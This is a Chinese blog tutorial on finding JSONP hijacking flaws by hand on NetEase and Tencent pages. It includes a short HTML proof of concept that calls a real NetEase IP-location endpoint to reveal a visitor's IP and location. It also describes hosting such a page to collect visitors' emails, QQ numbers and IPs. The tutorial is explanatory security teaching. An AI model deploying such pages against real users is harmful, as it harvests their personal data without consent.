jsonp漏洞手动挖掘

已于 2023-08-25 10:01:57 修改
阅读量1.1k 收藏 7
点赞数
文章标签: js jsonp
于 2020-11-10 18:39:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42746827/article/details/109565753
版权

jsonp漏洞挖掘

Jsonp(JSON with Padding) ,可以让网页从别的域名(网站)那获取资料,即跨域读取数据。他通过设定一个script标签,定义一个callback函数名并传入服务端,服务端调用该函数返回指定数据

JSONP漏洞与其他漏洞对比

  • xss漏洞劫持用户的cookie伪造登陆。
  • csrf伪造用户的操作欺诈服务器端进行敏感操作。
  • JSONP利用callback函数得到用户的敏感信息。
    相同点:上述三个漏洞都需要用户登录网站的cookie。
    不同点:xss和csrf对于用户来讲都有着更大的危害。但同时,这两个漏洞的发掘也是很不容易的,需要网站的源码中出现相关的代码漏洞,通常是网站的开发者不严谨造成的。而今天介绍的JSONP漏洞因为只涉及前端与后端的数据交换,所以没有所谓的漏洞注入点,所以危害性相对xss和csrf漏洞也小。

进行JSONP手动挖掘:

从实际出发,网易入手,先登录某网站博客的账号,这里我们在打开评论区让前端网页和服务端进行数据交互之前,先打开F12进入开发者模式,我们就可以看到所有前端与服务器端交互的数据。在这里插入图片描述

可以看到request和response。点击network,设置过滤关键字为callback,刷新页面,得到了前端与服务端交互的jsonp链接。点击其中的一个链接,查看返回的jsonp对象的数据。在这里插入图片描述
返回的数据为:nb.w.g.cbGetLoftJingxuan({“indexImgsRight”:[{“id”:1604910982058,“blogId”:0,“imageUrl”:“https://imglf3.lf127.net/img/bGlzMWo2T0pNY3FsempjUHhDbjl1dkJxZURPVmRPbW5zMmVMOEdnSStaanhXT05yRmUzN2VRPT0.jpg”,“time”:1604910982058,“pubisherId”:0,“publisherName”:null,“publisherNickName”:null,“smallImageUrl”:“https://imglf3.lf127.net/img/bGlzMWo2T0pNY3FsempjUHhDbjl1dkJxZURPVmRPbW5zMmVMOEdnSStaanhXT05yRmUzN2VRPT0.jpg?imageView&thumbnail=164x164&quality=96&stripmeta=0&type=jpg”,“blogNewAddImageUrl_115_115”:“https://imglf3.lf127.net/img/bGlzMWo2T0pNY3FsempjUHhDbjl1dkJxZURPVmRPbW5zMmVMOEdnSStaanhXT05yRmUzN2VRPT0.jpg?imageView&thumbnail=115x115&quality=96&stripmeta=0&type=jpg”,“blogNewAddImageUrl_240_150”:“https://imglf3.lf127.net/img/bGlzMWo2T0pNY3FsempjUHhDbjl1dkJxZURPVmRPbW5zMmVMOEdnSStaanhXT05yRmUzN2VRPT0.jpg?imageView&thumbnail=240x150&quality=96&stripmeta=0&type=jpg”,“title”:“”,“permalink”:“d7b61_11ac8bf”,“link”:“http://hanyijie.lofter.com/post/d7b61_11ac8bf”},(截取了数据其中的一段)

发现返回的JSONP数据是与图片相关的一些信息。
由于该网站的博客用户注册功能关闭,所以转到网易首页,同样F12并进行JSONP数据过滤。刷新网页,发现账户的图片地址,用户名,IP字段。在这里插入图片描述

思考:

到底在哪里会通过JSONP传递敏感信息呢?(敏感信息包括用户的账号,手机号,QQ号,密码,邮箱等。)
F12进行网上冲浪。多关注一些敏感数据交互的页面

发现漏洞

在网易,腾讯的各种业务界面寻摸了良久,发现某游戏通过某方式登录会通过JSONP泄露信息,某网站有的页面会泄露邮箱信息,另外还有的页面,通过callback参数,直接返回了IP地址和IP所在地的消息。这样,我们只需要搭建一个网站,在网站里写上js代码,跳转到jsonp的链接,就可以直接获得浏览网站用户的各种信息。这些获得的信息就是JSONP漏洞的价值,虽然不像XSS和CSRF漏洞那样,但是他的挖掘门槛相对来说低一些。另外,他的价值还不止于此。
这里给出我挖倔的JSONP漏洞使用图:

在这里插入图片描述
在这里插入图片描述
ip地址泄露:在这里插入图片描述
QQ号泄露:在这里插入图片描述
给出JSONP漏洞利用代码:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP暴露ip</title>
</head>
<body>
<script type="text/javascript">
function ip_callback(result)
        {
		    alert(result.result.country);
			alert(result.result.province);
			alert(result.result.city);
            alert(result.result.ip);
        }
</script>
<script type="text/javascript" src="https://ipservice.ws.126.net/locate/api/getLocByIp?callback=ip_callback"></script>
</body>
</html>

总结

JSONP的手动挖掘相对困难,要多以网站的角度去思考在哪些地方会传输用户的敏感数据。这样会使漏洞的发掘更加轻松。

巅峰メ瞎闹腾
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞利用】JSONP跨域请求漏洞 挖掘、利用详解
weixin_44023442的博客
03-13 3123
参考文章 轻松搞定JSONP跨域请求 jsonp跨域原理,使用以及同源策略 跨域漏洞JSONP和CORS跨域资源共享 Tag: Ref: [[019.同源策略]] 本片文章仅供学习使用,切勿触犯法律! 未写完,待补充 概述 总结 一、漏洞介绍 JSONP介绍 JSONPJSON with padding(填充式 JSON 或参数式 JSON)的简写。 JSONP是一种利用HTML中<script></script>元素标签,远程调用json文件来实现数据传递的技术,
ember-jsonp:手动JSONP加载器
05-02
] 这是名为jsonp服务附加组件,可在不使用jQuery的情况下为jsonp ember-ajax的UX提供JSONP数据演示使用范例 ember install ember-jsonp this.get('jsonp').request(URL,context,success,error,options); <<OR>> ...
JSONP挖掘高级利用
10-23
这里不多说JSONP的介绍等,大家都懂。 这里,我站在程序员的角度去解释JSONP的正常使用。 首先,定义一个用于接收数据的回调函数
JSONP漏洞详解
最新发布
2301_82257383的博客
05-16 231
JSONP是基于JSON格式的为解决跨域请求资源而产生的解决方案。实现的基本原理就是动态创建JSONP有两部分组成:回调函数和数据。回调函数就是当响应到来时应该在页面中调用的函数。数据就是传入回调函数中的JSON数据。
jsonp和callback的使用
丽丽大神ing的博客
01-31 8414
详情参考:https://blog.csdn.net/linli1991/article/details/73064806/ JSON数据是一种能很方便通过JavaScript解析的结构化数据。如果获取的数据文件存放在远程服务器上(域名不同,也就是跨域获取数据),则需要使用jsonp类型。使用这种类型的话,会创建一个查询字符串参数 callback=? ,这个参数会加在请求的URL后面。服务器端...
JSONP跨域访问漏洞
Echo__h的博客
05-02 458
构造如下页面,创建恶意链接诱使用户点击,即可获取用户的信息// 调用stringfy方法,将JSON对象转换为字符串 alert(JSON . stringify(args));//"></script> // %2B为+ %26为& < / script >模拟用户访问,成功将cookie和url地址添加到数据库。
谈谈对于XSS跨站脚本攻击的学习(1)
2302_76827504的博客
04-17 312
最近学完XXE之后,对于这种恶意代码注入的漏洞提起来兴趣,想着现在正好趁热打铁,学习一下XSS,之前做题的时候看大师傅的wp一愣一愣的,不明白个所以然,这次系统的学习一下,在本文中将介绍有关XSS的知识点以及原理,也会介绍XSS的绕过姿势(这里参考了别的大师傅的思路,也给出了我自己的理解),希望给正在学习XSS的你有帮助。
第81篇:JSONP劫持漏洞获取敏感信息原理、复现与坑点总结
ABC_123的博客
11-25 2041
Part1 前言大家好,我是ABC_123。今天我们研究一下JSONP劫持漏洞,早些年这个漏洞主要被攻击者用来窃取个人信息,如姓名、身份证号、家庭住址等,现在更多的用于蜜罐之中,间接溯源红队攻击者的个人身份。好多朋友至今对这个漏洞理解不深刻,能发现能利用,但是就是不明白原理,有时候别人能复现成功,但是自己却怎么都复现成功。今天ABC_123搭建一个tomcat环境,用java代码写了几个ser...
Jsonp漏洞简析及自动化漏洞挖掘脚本编写
mingyqf的博客
10-29 569
Jsonp漏洞被广泛的应用到渗透测试的信息搜集环节,攻击者在搞定一个站点之后,可以通过xss等形式插入jsonp漏洞利用代码,从而获取到浏览网站的用户的私人信息,本篇文章重点对jsonp漏洞利用原理进行阐述并提供一种jsonp漏洞自动化挖掘脚本的编写思路。 Jsonp跨域原理解析 为什么要跨域 为了用户的信息安全,浏览器在很早以前就引用了同源策略,同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。如果两个页面的协议,端口和域名都相同,则两个页面具有相同的源..
漏洞挖掘进化论-推开xray之门.pdf
08-08
JSONP 手动挖掘 漏洞挖掘的进化是从人工到自动化的过程 漏洞挖掘JSONP自动化 JSONP检测-正则升级之路 漏洞挖掘的自动化依赖于优秀的检测算法 JSONP检测 - 语义分析 自动化检测既靠质量也靠数量 Web POC 是如何工作...
jsonp
01-08
JSONP,全称为“JSON with Padding”,是一种在JavaScript中实现跨域数据交互的常见方法。由于浏览器的安全策略——同源策略,JavaScript通常被限制只能访问与当前页面同源(同协议、同域名、同端口)的资源。而...
jsonp原理及使用
10-26
JSONP,全称为JSON with Padding,是一种解决浏览器同源策略限制的技巧,允许网页通过JavaScript从其他域名下获取数据。由于浏览器的安全策略,通常JavaScript不能跨域请求数据,但JSONP巧妙地利用了`<script>`标签...
jsonp原理
xal
07-11 336
上面这段代码相当于向 http://localhost:3000/say?wd=Iloveyou&callback=show 这个地址请求数 据,然后后台返回 show(‘我不爱你’) ,最后会运行show()这个函数,打印出’我不爱你’
八种文件泄露总结
goddemon
12-08 2814
CTF技能书 一,WEB 信息泄露 常见类型 git源码泄露 svn源码泄露 hg源码泄漏 CVS泄露 Bazaar/bzr泄露 网站备份压缩文件 WEB-INF/web.xml 泄露 DS_Store 文件泄露 SWP 文件泄露 GitHub源码泄漏 学习链接 备份文件 ①备份导致问题 ②vim缓存–>即使用vim编辑器导致的问题 #典型文件 index.php.swp #-->即代交换的文档状况特点 用vim -r 文件名 编辑即可 ③.DS_Store文件 .DS_Store 文件利用
跨域漏洞JSONP和CORS跨域资源共享
dfdhxb995397的博客
05-09 499
进入正文之前,我们先来解决个小问题,什么是跨域? 跨域:指的是浏览器不能执行其它网站的脚本,它是由浏览器的同源策略造成的,是浏览器的安全限制! 跨域常见的两种方式,分别是JSONP和CORS。 今天i春秋以JSONP和CORS这两个知识点,分享一篇比较基础的跨域漏洞知识点,希望能够抛砖引玉。 JSONP跨域 JSONPJSON with padding),是一种利用...
Jquery跨域获得Json
weixin_33727510的博客
06-24 359
这两天用 Jquery 跨域取数据的时候,经常碰到 invalid label 这个错误,十分的郁闷,老是取不到服务器端发送回来的 json 值, 一般跨域用到的两个方法为:$.ajax 和$.getJSON   最后,仔细安静下来,细读 json 官方文档后发现这么一段:   JSON数据是一种能很方便通过JavaScript解析的结构化数据。如果获取的数据文件存放在远程服务器上(域名...
JSONP 劫持漏洞实例
11-15 2017
0x01 Jsonp简介 Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。 为什么我们从不同的域(网站)访问数据需要一个特殊的技术(JSONP )呢?这是因为同源策略。 同源策略,它是由Netscape提出的一个著名的安全策略,现在所有支持JavaScript 的浏览器都会使用这个策略。 ...
轻松搞定JSONP跨域请求
热门推荐
诗渊的博客
07-26 8万+
本文介绍了通过JSONP实现跨域请求,首先介绍了“同源策略”,然后介绍了同构JavaScript动态加载script标签的方法,实现JSONP跨域,最后介绍了jQuery中对JSONP的封装和使用
jsonp跨域访问漏洞
05-10
JSONP 的实现过程中存在一定的安全风险,主要原因是它需要在客户端动态创建 script 标签,而 script 标签可以执行任意的 JavaScript 代码,所以攻击者可以利用 JSONP漏洞进行 XSS 攻击等恶意行为。 攻击者可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值